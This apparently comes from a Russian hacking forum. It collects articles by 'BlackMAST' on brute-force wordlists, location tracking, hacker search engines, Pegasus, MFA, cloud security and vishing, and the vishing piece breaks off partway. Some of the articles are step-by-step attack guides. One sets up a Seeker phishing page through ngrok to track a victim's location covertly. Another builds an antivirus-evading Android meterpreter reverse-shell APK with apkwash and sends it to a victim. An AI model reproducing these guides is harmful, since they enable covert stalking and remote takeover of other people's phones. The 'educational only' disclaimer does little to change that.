От автора NEW Авторские статьи / схемы заработка от BlackMast

[BlackMAST]

Брут-словари Kali Linux на все случаи жизни​

Вступить в наш чат​

Представьте, что вы могли бы методом подбора выявить нужный пароль. Но сколько же это займёт времени, если вы будете делать это вручную? Страшно представить. А что, если за вас это сделает специальная программа, способная проверять сотни и даже тысячи паролей в минуту? Шансы на успех вырастают, не так ли? Данный метод получил название «брутфорс». Но для того, чтобы взлом увенчался успехом, необходимо иметь в своем арсенале словари под разные случаи жизни.

Усаживайтесь поудобнее, сегодня мы поделимся с вами словарями для брутфорса.

Что такое атака по словарю

Брутфорс атака — метод взлома, при котором хакер подбирает логин или пароль к учетной записи с помощью перебора всех возможных вариантов.
Данный метод уже очень давно является автоматизированным, так как существует огромное количество словарей, которые регулярно обновляются.
Брутфорс словарь представляет из себя файл (часто текстовый документ), содержащий список слов самых распространенных паролей.

Дисклеймер: Данная статья предоставлена исключительно в образовательных целях. Мы не несём ответственности за любые ваши действия.

Списки слов в Kali Linux:

Поскольку Kali Linux изначально создавался исключительно для пентестинга, он вдоль и поперек напичкан различными словарями.
Расположение: /usr/share/wordlists

DirBuster

DirBuster — это многофункциональный инструмент, предназначенный для брутфорса имён директорий, файлов приложений и серверов. В Kali Linux словари располагаются в директории /usr/share/wordlists/dirbuster/. Инструмент dirbuster имеет много дополнительных параметров. Например, существует каталог Wi-Fi, специально предназначенный для взлома аутентификации Wi-Fi.
Словари в DirBuster различаются по размеру и языкам. Мы будем использовать команду tree, чтобы вывести весь список слов внутри каталога dirb.

Metasploit

Metasploit имеет списки слов практически для всего. В основном эти словари предназначены для брутфорса удалённого входа в различные службы, имеются неплохие универсальные словари с именами пользователей и паролями.

Rockyou

Rockyou.txt представляет собой набор скомпрометированных паролей от создателя приложения MySpace, иначе называемого RockYou. В декабре 2009 года организация столкнулась с утечкой информации, в результате которой было раскрыто более 32 миллионов учетных записей клиентов.
Расположение: /usr/share/wordlists
Во время загрузки Kali Linux он будет находится в документе gz.
gzip -d /usr/share/wordlists/rockyou.txt.gz

Wfuzz

Wfuzz был разработан для брутфорсинга приложений. Он также может изменить запрос с GET на POST. Эта функция может быть полезной в различных ситуациях, например при проверке SQL-инъекций. Для удобства словари разделены на списки.
Расположение: /usr/share/wordlists/wfuzz

Nmap

Nmap поставляется с несколькими списками, среди которых имеется словарь с паролями. На Kali Linux все они размещены в папке: /usr/share/nmap/nselib/data/.
Заключение

Существуют различные способы взлома, но брутфорс занимает почетное первое место среди них. Методом подбора можно легко узнать пароль жертвы, особенно при помощи специальных инструментов, о которых мы вам сегодня рассказали. Надеемся, что эта статья оказалась для вас полезной. Удачи!

 

[BlackMAST]

Отслеживаем местоположение человека без доступа к телефону

Вступить в наш чат​

Интернет кишит услугами и советами для определения местоположения людей, но почти все они требуют прямого доступа к телефону жертвы. Что ж, в этой статье мы покажем вам более продвинутый способ для отслеживания чьего-либо местоположения с помощью инструмента Seeker. Эта статья поможет вам не только установить слежку, но и получить подробную информацию об устройстве жертвы.

Как работает инструмент Seeker

Шаг 1: Мы создадим фишинговый сайт, который будет запрашивать разрешение на определение местоположения. Чтобы способ сработал, нужно вооружиться навыками социальной инженерии.
Если вы все еще профан в социальной инженерии, то советуем прочитать нашу статью.
Шаг 2: Чтобы сайт выглядел убедительным и не вызывал подозрений, мы будем использовать инструменты сокращения URL-адресов.
Требования:

• Kali Linux — лучшая ОС для взлома;
• Seeker — для запуска фишингового сайта и анализа полученных данных для определения точного местоположения цели.
• Ngrok — для создания уникальных ссылок в Интернете. Если у вас нет Kali Linux, вы также можете выполнить этот хак на nethunter или termux.

Дисклеймер: Данная статья предоставлена исключительно в образовательных целях. Мы не несём ответственности за любые ваши действия.

Установка Seeker в Kali Linux

Введите следующие команды, чтобы установить зависимости, необходимые для Seeker:

sudo apt-get install python3 python3-pip php ssh git

pip3 install requests

Нажмите Y, когда у вас запросят подтверждение, после чего эти зависимости будут загружены и установлены на вашем Kali Linux. Теперь установите и настройте Seeker Tool, клонировав инструмент с помощью следующей команды:

git clone https://github.com/thewhiteh4t/seeker

Теперь переключитесь в каталог Seeker, используя приведенную ниже команду:

cd seeker

Если вы хотите увидеть все параметры, которые есть в приложение, введите:

python3 ./seeker.py -h

Установка Ngrok в Kali Linux

Теперь вам необходимо установить Ngrok в вашей системе Kali Linux:

wget https://bin.equinox.io/c/4VmDzA7iaHb...inux-amd64.zip

Теперь разархивируйте файл:

unzip <введите_здесь_название_пап ки_ngrok>

Теперь перейдите на сайт Ngrok и завершите бесплатную регистрацию. Вы можете просто войти в свою учетную запись Google или GitHub.

После регистрации вы получите свой токен. Теперь введите команду с вашим токеном аутентификации:

./ngrok authtoken <ваш_токен>

Приведенная выше команда добавит ваш токен авторизации в файл ngrok.yml. Теперь изменим права доступа, чтобы Ngrok мог запускаться прямо из терминала:

****d +x ./ngrok

Вы можете открыть справку и проверить все параметры Ngrok:

./ngrok -h

Устанавливаем слежку

Чтобы начать использовать Seeker, введите следующую команду:

python3 ./seeker.py -t manual

Вы увидите 4 шаблона, которые можно использовать для генерации страницы:
[0] NearYou
[1] Google Drive
[2] WhatsApp
[3] Telegram
Для наглядности мы выберем The Near You.
Далее создаем туннель на наш локальный сервер с помощью Ngrok:

./ngrok http 8080

Обязательно используйте 8080, а не 80, как предлагает Ngrok.
Готово, ссылка сгенерирована и будет выглядеть примерно так:
https://10f34f608fb4.ngrok.io
Теперь эту ссылку нужно отправить жертве. Вы можете использовать такой сервис, как bitly, чтобы сократить URL-адрес и сделать его похожим на любой другой URL-адрес.
Пользователь увидит следующую страницу:

Страница выглядит неплохо, но вы всегда можете отредактировать HTML-файл и подстроить ее под вашу жертву. Надпись на английском говорит, что сайт позволяет найти людей поблизости и завести новые знакомства. Если пользователь нажимает кнопку «Continue» появиться запрос на определение местоположения.

После согласия создается файл данных, содержащий всю информацию о местоположении человека. Способ показывает лучшие результаты, если страницу открывают с мобильного устройства, поскольку все телефоны имеет модуль GPS.
Можно также использовать шаблон Gdrive, который создает фейк-страницу Google Диска.
Давайте еще рассмотрим шаблон Whatsapp для определения местоположения человека. На этот раз попробуем обойтись без Ngrok.
Вводим команду:

python3 ./seeker.py

Выбераем шаблон Whatsapp. После чего будет создана ссылка WhatsApp + Serveo.

Необходимо указать название группы и расположение изображения для использования в качестве значка группы.

Как только пользователь откроет ссылку WhatsApp, он увидит следующее уведомление:

Запрос поможет отследить точное местоположение человека.
Точные данные о местоположении будут выглядеть так:

Заключение

Вот так просто вы можете отслеживать чье-либо местоположение с помощью инструмента Seeker. Конечно, вам потребуется применить социальную инженерию, а также творческий подход, но в случае успеха этот хак оправдает все ваши усилия. Надеемся, что данная статья оказалось полезной. На этом все. Удачного взлома!

 

[BlackMAST]

10 лучших хакерских поисковиков

Вступить в наш чат​

Ежедневно мы используем Google и Яндекс для поиска той или иной информации в Интернете. Но знаете ли вы, что существуют и другие поисковики, позволяющие заглянуть в скрытую и малоизученную сторону глобальной сети? Интернет часто отождествляют с вебом, но WWW — это всего лишь вершина айсберга. Его глубинная часть куда разнообразнее, и хоть она скрыта от глаз рядовых пользователей, ничто не мешает изучать ее специализированными инструментами.

Существует большое количество поисковых систем, которые хакеры используют для различных целей, и сегодня мы расскажем про лучшие из них.

1. Shodan

Shodan считается одной из лучших поисковых систем для хакеров во всем мире. Теневой аналог Гугла помогает получить информацию о любом устройстве, подключенном к Интернету. Совсем недавно его основную долю составляли роутеры, сетевые принтеры, IР-камеры, светофоры, но теперь даже некоторые лампочки имеют собственный IР-адрес. Мощные фильтры позволяют отобрать результаты по стране, городу или даже вручную по заданным координатам.
2. Censys

Censys — это сервис, похожий на Shodan, поскольку он также отслеживает устройства, которые имееют доступ в Интернет. Он собирает о них данные и предоставляет их в виде поисковой системы.
3. Greynoise

В отличие от Shodan и Censys, Greynoise позволяет идентифицировать серверы и пользователей, которые сканируют различные сети и устройства на наличие уязвимостей с помощью поисковых систем. Используя Greynoise, вы можете получить информацию о вредоносных сайтах и взломах, введя IP-адрес или ключевые слова. Это может пригодится хакерам, имеющим дело с тысячами IP-адресов, чтобы отфильтровать нежелательный фоновый интернет-шум, который мешает взлому.
4. Wigle

Wigle предназначен для поиска беспроводных сетей с помощью координат. Он показывает карту, на которой вы можете ввести широту и долготу, чтобы найти все доступные точки доступа в сети, Wi-Fi и даже телекоммуникационные антенны. Его можно использовать для мониторинга незащищенных систем, уязвимых для атак или просто для поиска открытых сетей в определенной области.
5. Zoomeye

Zoomeye — удобный хакерский инструмент, который действует как навигационная карта для поиска уязвимостей в Интернете. Он записывает многочисленные объемы данных с разных сайтов и устройств, к которым пользователи могут получить доступ, введя IP-адрес, имя устройства или любое другое ключевое слово. Помимо этого, Zoomeye показывает статистику всех устройств.
6. Hunter

Hunter можно использовать для поиска и извлечения всех адресов электронной почты, связанных с определенным доменом или организацией. Все, что вам нужно сделать, это ввести название компании в Hunter. Он отображает список адресов электронной почты, относящихся к этому домену, включая их активность и ресурсы, которые использовались для этих адресов. Разработчики также создали API для проверки электронной почты и получения дополнительной информации об организации.
7. PiPl

PiPl — крупнейший поисковик по людям в мире. Он может раскрыть все о человеке, включая его имя, контакты, место работы и другую личную информацию.
8. PublicWWW

PublicWWW — поисковик исходного кода в виде HTML, CSS, JavaScript и т. д. Используя эту поисковую систему, можно искать сайты на основе их исходного кода. Все, что вам нужно сделать, это ввести небольшую часть кода HTML, CSS или JS в поле поиска, и система предоставит вам список всех сайтов и веб-страниц, которые использовали аналогичный фрагмент кода.
9. HIBP

HIBP расшифровывается как «Have I be pwned». Это поисковая система в Интернете, которая полезна как для хакеров, так и для обычных пользователей, поскольку она проверяет учетную запись на наличие взлома, связанного с утечками данных в системе. Инструмент сканирует различные базы данных и идентифицирует утечки конкретных учетных записей.
10. OSINT Framework

Инструмент собирает информацию, доступную из общедоступных источников. Этот поисковик в основном используется правоохранительными органами, службами безопасностями, так как он включает в себя адреса электронной почты, общедоступные записи, имена пользователей, IP-адреса и многие другие параметры на выбор.
Заключение

Хакеры во всем мире активно используют эти поисковые системы для выявления уязвимостей в системах или получения информации о потенциальных целях. Однако, вышеупомянутые поисковые системы могут оказаться весьма полезными не только для хакеров, но и для обычных пользователей. Надеемся, что данная статья была полезной для вас. Удачного поиска!

 

[BlackMAST]

Pegasus: скандальное шпионское ПО взорвавшее интернет

Вступить в наш чат​

В современном мире технологии давно уже несут не только пользу, но и опасность. Одной из таких угроз, которая потрясла мировое сообщество и повлекла за собой серьезный ущерб, стала Pegasus. В этой статье мы расскажем о происхождении шпионского ПО Pegasus, его масштабных атаках и способах защиты.

Происхождение Pegasus

Шпионское ПО Pegasus, названное в честь мифического крылатого коня из греческой мифологии, было создано израильской технологической компанией NSO Group. Первоначально ПО разрабатывалось для благой цели — отслеживания преступников и террористов, но позже превратилось в опасное кибероружие, способное проникать в мобильные устройства. Впервые ПО Pegasus привлекло внимание общественности в 2016 году, когда известный правозащитник из ОАЭ получил подозрительное сообщение. Вместо того, чтобы перейти по ссылке в этом сообщении, Ахмед Мансур благоразумно отправил ее исследователям Citizen Lab, организации по кибербезопасности. Они обнаружили, что ссылка содержит шпионское ПО Pegasus, которое в случае активации предоставило бы злоумышленникам полный контроль над айфоном Мансура, позволяя им подслушивать разговоры, читать сообщения и собирать конфиденциальную информацию.
Как устроен Pegasus

Шпионское ПО Pegasus классифицируется как эксплойт «нулевого клика» — это означает, что оно может проникнуть на устройство без какого-либо взаимодействия с пользователем. После установки Pegasus может бесследно записывать звонки, читать сообщения и просматривать любые данные в телефоне. Пегас также может получить доступ к микрофону и камере устройства, что превращает его в мощный инструмент для слежки. Более того, Pegasus может обходить даже самые безопасные приложения, такие как WhatsApp, используя уязвимости в операционных системах.

Опасности и ущерб

Шпионское ПО Pegasus представляет серьезную угрозу для отдельных лиц, организаций и даже правительств. Его возможности позволяют ставить под угрозу неприкосновенность личной жизни, компрометировать конфиденциальную информацию и нарушать права человека.
Летом 2021 года стало известно, что правительства по всему миру использовали шпионское программное обеспечение Pegasus от NSO Group для незаконной слежки за правозащитниками, политическими лидерами, журналистами и юристами по всему миру.
Pegasus и споры

Использование шпионского ПО Pegasus не обошлось без споров. Обвинения в его неправомерном использовании и потенциальных нарушениях прав человека вызвали широкое осуждение и судебные иски. Критики утверждают, что инструментам наблюдения, таким как Pegasus, не хватает прозрачности и надзора. Скрытный характер шпионских инструментов не дает установить правомерность их использования.
Велись общественные дебаты касаемо тонкой границы между безопасностью и конфиденциальностью. В то время как правительства утверждают, что такое наблюдение необходимо для национальной безопасности и борьбы с терроризмом, защитники прав на неприкосновенность частной жизни считают, что такие ПО оказывают только негативное влияние.
Разоблачения, связанные с Pegasus, вызвали призывы к более строгому регулированию и надзору за шпионскими технологиями. Вводятся новые правовые рамки и международные соглашения, регулирующие использование таких инструментов.
Защита от Pegasus

Обнаружение и устранение шпионского ПО Pegasus вызывает значительные трудности из-за его сложной структуры и способности использовать уязвимости в мобильных устройствах. Однако, организации по кибербезопасности активно работают над выявлением и противодействием этим попыткам навязчивой слежки.
Несмотря на то, что борьба с передовым кибероружием Pegasus является сложной задачей, есть меры, которые вы можете предпринять для повышения своей безопасности:

• Регулярно обновляйте программное обеспечение. Разработчики постоянно работают над устранением уязвимостей, которые могут быть использованы шпионскими программами, такими как Pegasus.
• Используйте последнюю версию операционной системы, что значительно снизит риск стать жертвой таких атак.
• Установите надежный антивирус. Антивирусное программное обеспечение может помочь обнаружить потенциальные угрозы. Регулярное сканирование устройств на наличие любой подозрительной активности имеет решающее значение для своевременного обнаружения.
• Соблюдайте осторожность. Будьте бдительны, когда переходите по ссылкам, загружаете вложения или отвечаете на нежелательные сообщения. Проверяйте источник и подлинность любого сообщения, прежде чем предпринимать какие-то действия.
• Защитите свою сеть Wi-Fi с помощью надежного пароля. Используйте протоколы шифрования и включите брандмауэр для защиты от взлома.
• Ограничьте разрешения приложений. Просмотрите разрешения, предоставленные приложениям на вашем устройстве. Ограничьте доступ к конфиденциальным данным, таким как местоположение или микрофон, приложениям, которым они не нужны.
• Регулярно создавайте резервные копии данных. Храните резервные копии на отдельных устройствах или в безопасном облачном хранилище.
• Будьте в курсе последних угроз и защитных мер в области кибербезопасности.

Заключение

Появление шпионского ПО Pegasus демонстрирует сложную природу киберугроз в современном цифровом ландшафте. Его возможности проникать в устройства и нарушать конфиденциальность являются ярким напоминанием о важности соблюдения надежных мер кибербезопасности. Сохраняя бдительность, применяя защитные меры и оставаясь в курсе новостей, пользователи могут противостоять такому грозному кибероружию, как Pegasus. Давайте стремиться защитить наш цифровой мир и обеспечить безопасность перед лицом постоянно меняющихся угроз.

 

[BlackMAST]

Вступить в наш чат​

В современном киберпространстве конфиденциальность личных данных является первостепенной задачей для многих пользователей. Чтобы защититься от постоянно меняющихся киберугроз, одних паролей уже недостаточно. Тут на помощь приходит многофакторная аутентификация (MFA), она сочетает в себе несколько уровней защиты, значительно повышая безопасность.​

Сегодня мы расскажем о видах MFA, ее важности и потенциале.

С ростом киберпреступности использование пароля, как основного способа защиты, уже не является панацей. Брутфорс, фишинговые атаки и утечки данных еще раз доказывают, что для защиты учетных записей необходим более надежный подход. В качестве решения этих проблем появилась многофакторная аутентификация.
Эволюция MFA

Токен аутентификация

Одним из ранних видов MFA является система аутентификации на основе токенов, которая генерирует одноразовые пароли (OTP), синхронизированные с сервером. Эти одноразовые пароли постоянно меняются, оставаясь действительными только в течение короткого периода времени, что обеспечивает дополнительный уровень безопасности.
Двухфакторная аутентификация (2FA)

Двухфакторная аутентификация ввела дополнительный уровень безопасности. В добавок к паролю пользователи должны указать второй фактор для подтверждения своей личности.
Этот второй фактор обычно попадает в одну из трех категорий:
​

1. Что-то, что знает пользователь: это может быть PIN-код, секретный вопрос или уникальный личный идентификатор.​
2. Что-то, чем владеет пользователь: сюда входят физические токены, смарт-карты или брелоки, которые генерируют одноразовые пароли (OTP).​
3. Что-то, чем является пользователь: это включает биометрические факторы, такие как отпечатки пальцев, сканирование радужной оболочки или распознавание лиц.​

2FA обеспечивает более высокий уровень безопасности за счет объединения нескольких факторов аутентификации, что значительно затрудняет получение доступа злоумышленникам.
Трехфакторная аутентификация (3FA)

Трехфакторная аутентификация добавляет еще один уровень безопасности помимо пароля и второго фактора.
Этот третий фактор может включать в себя комбинацию следующего:
​

1. Что-то, что знает пользователь: это может быть пароль или PIN-код.​
2. Что-то, чем владеет пользователь: это могут быть физические жетоны, смарт-карты или брелоки.​
3. Что-то, чем является пользователь: это включает в себя биометрические факторы, такие как отпечатки пальцев, сканирование радужной оболочки или распознавание лица.​
4. Что-то, что делает пользователь: это включает в себя поведенческие или контекстуальные факторы, такие как шаблоны ввода, местоположение устройства или активность пользователя.​

Появление MFA, включая 2FA и 3FA, обусловлено необходимостью устранить ограничения однофакторной аутентификации и усилить общую безопасность. Одни только пароли не являются безопасными: они подверженны различным атакам. MFA стремится снизить эти риски, требуя от пользователей предоставления дополнительных форм проверки, что значительно снижает вероятность взлома.
SMS-аутентификация

Когда мобильные устройства стали повсеместными, MFA начали использовать аутентификацию на основе SMS. Этот подход заключается в отправке одноразового кода на зарегистрированный номер мобильного телефона пользователя, который затем нужно ввести для подтверждения личности. Несмотря на удобство, MFA на основе SMS имеет уязвимости, такие как клонирование и перехват SIM-карты. Это привело к поиску более безопасных альтернатив.
Биометрическая аутентификация

Интеграция биометрической аутентификации произвела революцию в среде MFA. Биометрические данные, такие как отпечатки пальцев, сканирование радужной оболочки глаза и распознавание лиц, обеспечивают надежную защиту. Биометрическая аутентификация не только повышает безопасность, но и имеет более удобный пользовательский интерфейс. Смартфоны и другие устройства теперь оснащены биометрическими датчиками, которые позволяют пользователям быстро разблокировать свои устройства одним только взглядом или касанием.
Контекстная и поведенческая аутентификация

Этот способ аутентификация использует машинное обучение и проверку поведения пользователей для анализа попыток доступа. Сюда входят такие факторы, как информация об устройстве, местоположение, время доступа и т.д. Оценивая эти контекстуальные подсказки, системы могут принимать разумные решения о подлинности попытки входа в систему, обеспечивая беспрепятственный доступ для доверенных пользователей и подавая сигналы тревоги в случае подозрительной активности.
Плюсы многофакторной аутентификации:

​

1. Повышенная безопасность. Основным преимуществом MFA является способность значительно повысить конфиденциальность, требуя от пользователей предоставления нескольких форм проверки личности. Даже если злоумышленники завладели одним из факторов проверки, дополнительные уровни аутентификации послужат дополнительной защитой.​
2. Защита от брутфорс-атак. MFA снижает риск атаки с использованием паролей. Даже если пароль пользователя ненадежен или скомпрометирован, дополнительные факторы аутентификации снижают вероятность взлома.​
3. Скорость. Хотя MFA добавляет дополнительный уровень проверки, это не делает процесс аутентификации более долгим. Такие факторы, как биометрическая аутентификация (отпечаток пальца, распознавание лица) обеспечивают беспрепятственный и быстрый процесс проверки.​

Минусы многофакторной аутентификации:

​

1. Сложность и проблемы в использовании. Одним из потенциальных недостатков MFA является его сложность, которая может создавать проблемы для некоторых пользователей. Управление несколькими факторами аутентификации и их запоминание могут быть трудоемкими, особенно если пользователям необходимо часто проходить аутентификацию на разных платформах.​
2. Зависимость от внешних факторов. Некоторые формы MFA, например, аутентификация на основе SMS, зависят от внешних факторов. Эта зависимость создает уязвимости, поскольку эти внешние системы могут быть подвержены сбоям, задержкам или нарушениям безопасности. Крайне важно выбрать методы MFA, которые сводят к минимуму зависимость от потенциально небезопасных или ненадежных внешних факторов.​
3. Ошибки. В некоторых случаях системы MFA могут выдавать ошибки из-за технических сбоев или человеческого фактора, что вызывает неудобства.​

Заключение

Беспарольные методы аутентификации, такие как биометрические данные, SMS, аппаратные токены, все больше набирают популярность. Комбинируя несколько уровней проверки, MFA обеспечивает более безопасную цифровую среду для пользователей во всем мире и помогает защитить конфиденциальную информацию от злоумышленников.​

 

[BlackMAST]

Вступить в наш чат

В последние годы резко возросло количество облачных сервисов: возможность получать доступ к своим файлам из любого места сделали их популярными среди многих пользователей. Однако, за этой популярностью последовало значительное увеличение числа кибератак, направленных на эти сервисы.

В этой статье мы расскажем с какими угрозами сталкиваются владельцы облачных хранилищ, а также какие меры безопасности необходимо соблюдать, чтобы это удобное изобретение не обернулось утечкой ваших данных.

Как взламывают облачные сервисы

Чтобы полностью осознать масштаб проблемы, важно понять как устроены облачные сервисы.

Облако позволяет пользователям хранить, управлять и получать доступ к своим данным удаленно через серверы, подключенные к Интернету.

Спо*собов взло*ма мно*го: фишинг, сти*леры, перебор пароля и даже высоко*тех*нологич*ные ата*ки на про*вай*деров и опе*рато*ров сотовой свя*зи.

• Распределенные атаки типа «отказ в обслуживании» (DDoS) подавляют работу облачных хранилищ, что нарушает работу сервисов.
• Внедрение вредоносного ПО.Злоумышленники используют уязвимости в облачных системах для внедрения вредоносного кода или вредоносного ПО, которые позволяют им получить контроль, украсть данные или нарушить работу служб.
• Внутренние угрозы. В облачных службах часто участвует множество сторон, включая облачных провайдеров, клиентов и сторонних поставщиков. Облачные провайдеры хранят огромные объемы конфиденциальных данных, что делает их главной целью для злоумышленников. Кроме того, внутренние угрозы возникают, когда доверенное лицо с авторизованным доступом злоупотребляет своими привилегиями, что приводит к краже данных.

Масштабные атаки на облачные сервисы

Утечка данных Target (2013 г.). В результате одной из самых масштабных утечек данных гигант розничной торговли Target потерпел крах: были украдены данные около 110 миллионов клиентов. Злоумышленники получили доступ к сети Target через учетные данные стороннего поставщика, используя уязвимости в облачной системе.
DDoS-атака Dyn (2016 г.). Атака Dyn, массовая распределенная атака типа «отказ в обслуживании» (DDoS), затронула множество крупных веб-сайтов и сервисов, включая Twitter, Netflix и ******. Атака была нацелена на облачную инфраструктуру системы доменных имен (DNS) Dyn, что привело к массовым сбоям в обслуживании и выявило уязвимость критически важных облачных служб.
Утечка данных Capital One (2019 г.). В ходе одной из крупнейших утечек данных в истории банковского дела в Capital One была раскрыта личная информация более 100 миллионов клиентов. Кроме того, злоумышленник воспользовался неправильно настроенным брандмауэром приложений (WAF) в облачной среде Capital One, тем самым получив несанкционированный доступ к данным клиентов, хранящимся на серверах Amazon Web Services (AWS).
Кампания Cloud Hopper (2018 г.). Cloud Hopper проникли в сети MSP и получили контроль над облачными хранилищами нескольких организаций, что позволило им украсть данные и вести шпионскую деятельность.
Удаление данных Code Spaces (2014 г.). Платформа Code Spaces столкнулась с разрушительной атакой, которая стала причиной полного прекращения работы. Злоумышленники получили доступ к облачной инфраструктуре компании и начали удалять данные и резервные копии клиентов.
Как защитить свое облако

Чтобы противостоять атакам, важно предпринимать надежные меры безопасности в своих облачных сервисах. Вот несколько советов, которые могут помочь:

• Многофакторная аутентификация. Используете многофакторную проверку личности (MFA) для повышения безопасности. MFA значительно снижает риск взлома и повышает общий уровень безопасности.

Подробнее о многофакторной аутентификации читайте в нашей статье.

• Шифрование. Шифрование данных как при хранении, так и при передаче играет решающее значение для обеспечения конфиденциальности. Эта практика преобразует данные в нечитаемый формат, делая их бесполезными для третьих лиц, даже если им удастся их перехватить. Используя надежные алгоритмы шифрования, пользователи могут защитить свои данные от возможных атак.

Что такое стеганография, и как зашифровать файлы читайте тут.

• Регулярные аудиты безопасности. Проведение систематических проверок безопасности помогает выявлять уязвимости на ранних этапах. Оперативно устраняя их, пользователи могут быть уверены, что их данные не будут скомпрометированы.
• Оставаться в курсе последних новостей. Каждый пользователь, который беспокоится о своей безопасности, должен регулярно следить за передовыми методами обеспечения безопасности, чтобы значительно минимизировать шансы на возможные атаки.

Читайте также: Как создать свое безопасное облачное хранилище.

Заключение

Поскольку пользователи все больше полагаются на облачные сервисы, хакерские угрозы продолжают расти. Каждый человек должен осознавать потенциальные риски и принимать активные меры для защиты своих данных. Следуя нашим советами, вы можете эффективно защитить свои данные и избежать взлома. Только совместными усилиями мы можем обеспечить постоянный рост облачных технологий, одновременно, поддерживая безопасность и целостность наших данных.​

 

[BlackMAST]

Вступить в наш чатАнтивирусы — чрезвычайно полезные инструменты — но не в тех ситуациях, когда вам нужно оставаться незамеченным в атакуемой сети. Обход антивируса на андроиде — одна из самых сложных задач. Ну, по крайней мере, так было раньше, пока у нас не появились такие инструменты, как Apk Bleach и Apk Wash, которые могут скрыть вредоносные приложения от обнаружения антивирусами. Сегодня мы покажем, как хакеры обходят антивирусную защиту на андроиде, избежав обнаружения во время взлома и тестирования на проникновение.

​

Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.​

Возможности инструмента

​

• Stealth option — этот параметр позволяет вам определить количество сеансов эксплойта, которые будут созданы.​
• Icon injection — с помощью этой опции выберите значок, который вы хотите отобразить на устройстве жертвы. Вы также можете создать свою собственную иконку.​
• Application renaming —придумайте название вашему приложению.​
• Signing the apk — подпишите apk. Поскольку msfvenom создает неподписанные приложения для Android, иструмент использует jar signer для подписи сгенерированных полезных нагрузок.​

Apk Wash также позволяет построчно редактировать разрешения. Инструмент просматривает каждое из разрешений и запрашивает разрешение на их удаление или сохранение.
Установка инструмента

Шаг 1: Загрузите Apk Wash и клонируйте его в Kali Linux с помощью следующей команды:
git clone https://github.com/jbreed/apkwash.git Шаг 2: Предоставьте разрешения инструменту с помощью следующей команды, как показано ниже:
****d +x apkwash mv apkwash /usr/local/bin/. Шаг 3: Теперь мы можем использовать следующую команду для создания вредоносного файла:
Ниже приведены параметры, которые вы можете использовать, чтобы создать вредоносные файлы:
-p | –payload <payload> Устанавливает полезную нагрузку, которая будет сгенерирована msfvenom.
-о | –output <outfile.apk> Задает имя созданного APK, а также файл apk.
-х | –original <infile.apk> APK для внедрения полезной нагрузки.
-g | –generate Генерирует полезную нагрузку, используя значения по умолчанию.
-n | –newkey Генерирует новый ключ отладки перед подписью.
-v | – verbose Показывает вывод команд.
-d | – d***g Оставляет файлы /tmp/payload на месте для просмотра.
-h | – help Справочная информация.
apkwash -p android/meterpreter/reverse_tcp LHOST=192.168.0.12 LPORT=1337 -o update.apk Шаг 4: Теперь у вас есть вредоносный apk-файл, который нельзя обнаружить антивирусом. Существует всего несколько антивирусов, которые могут помечать этот файл как вирус, но это случается очень редко.
Теперь отправьте ваше приложение жертве, используя методы социальной инженерии. Убедитесь, что жертва загрузит и установит приложение на свой андроид, после чего вы сможете удаленно отправлять команды на ее устройство. Стоит отметить, что установка проходит гладко, без каких-либо подозрительных уведомлений от Google Play Protect.
Заключение

Наверняка вы сталкивались с ситуациями, когда доступ к атакуемой сети получен и от заветной цели вас отделяет всего один маленький шаг, а антивирус не позволяет вам сделать этот шаг (например, не дает запустить нужную программу). Во многих случаях у вас есть только одна попытка — и она терпит неудачу из-за тревоги, поднятой антивирусом. Иногда антивирусы удаляют абсолютно безобидные файлы, а не только исполняемые. В результате скрыть реальную угрозу становится крайне сложно. В этой ситуации на помощь приходит Apk Wash, который не даст антивирусу себя обнаружить. Сегодня вы не только узнали о существовании такого нужного инструмента, но и научились использовать его на практике. На этом все. Удачи!​

 

[BlackMAST]

Вишинг: Что это такое и как защититься​

Вступить в наш чат​

По мере развития технологий совершенствуется и тактика киберпреступников, стремящихся завладеть личной и финансовой информацией пользователей. Одним из таких способов мошенничества, получивший известность в последние годы, является вишинг. В этой статье мы подробно изучим мир вишинга, поймем, как он работает, и вооружимся знаниями, которые помогут предотвратить такое мошенничество и защитить вашу личную информацию.

Открывая мир вишинга

Вишинг (англ. Vishing, сокращение от “voice phishing,”), что в переводе означает «голосовой фишинг», — это тип атаки с использованием социальной инженерии, при которой злоумышленники выдают себя за доверенные организации или отдельных лиц посредством телефонных звонков или сообщений голосовой почты. Конечная цель — получить личную, финансовую и конфиденциальную информацию от своих жертв.
Мошенники каждый раз действуют по определенной схеме: рассылают сообщения с вредоносными ссылками, после перехода по которым, отображается синий экран с предупреждающим сообщением и бесплатным номером телефона, по которому следует позвонить для устранения возникшей проблемы с компьютером.
По указанному номеру телефона отвечает технический специалист, готовый оказать любую помощь пользователю, после того как последний предоставит «специалисту» информацию о своей кредитной карте для оплаты программного обеспечения. После передачи потерпевшим данной информации, мошеннические действия завершаются, программное обеспечение не работает, технический специалист не отвечает, а денежные средства с банковской карты пропадают.
Распознать потенциальное мошенничество можно по определенным предупреждающим знакам:

• Доверенные лица. Зачастую мошенники представляются экспертами или специалистами в каких-либо областях. При этом, они могут называться компьютерными специалистами, банкирами, полицейскими и т.д. Целью этого подражания является создание у жертв ложного чувства безопасности.
• Срочность и страх. Мошенники манипулируют жертвами, вызывая у них чувство неотложности или страха. Например, они могут заявить, что ваш банковский счет заблокирован и необходимо немедленно снять блокировку. Эта срочность вынуждает людей поспешно раскрывать конфиденциальную информацию.

Инструменты для поиска жертвы

В схемах вишинга злоумышленники используют генераторы мобильных номеров и скрипты для проверки их валидности (чекеры). Как понятно из названия, генератор создает подборку номеров, а чекеры проверяют, активны ли они.

На этих скриншотах вы можете увидеть, как происходит проверка сгенерированных ранее мобильных номеров. Кроме, их валидации, указывается регион и провайдер связи. В итоге злоумышленник получает список номеров для распространения мошеннических сообщений. Такие же инструменты используются, например, для сбора контактов из мессенджеров.
Некоторые инструменты открыто можно найти в легальных магазинах приложений, по типу Chrome Store и Google Play.

Существует множество магазинов, где мошенник может купить базы данных потенциальных жертв (обычно это email или мобильные номера, а также может быть фамилия и имя человека, регион проживания). Данные магазины могут использоваться для покупки, например, базы мобильных номеров для спама и телефонного мошенничества. Также там можно приобрести аккаунты соцсетей и мессенджеров для последующего совершения мошеннической атаки.

Как защититься от вишинга

1. Проверьте личность вызывающего абонента
Никогда не доверяйте слепо информации абонента, даже если она, как вам кажется, получена из надежного источника. Если во время телефонного звонка вам поступил запрос о вашей личной информации, немедленно повесьте трубку. Затем самостоятельно проверьте личность звонящего по официальным каналам.
2. Берегите свою личную информацию
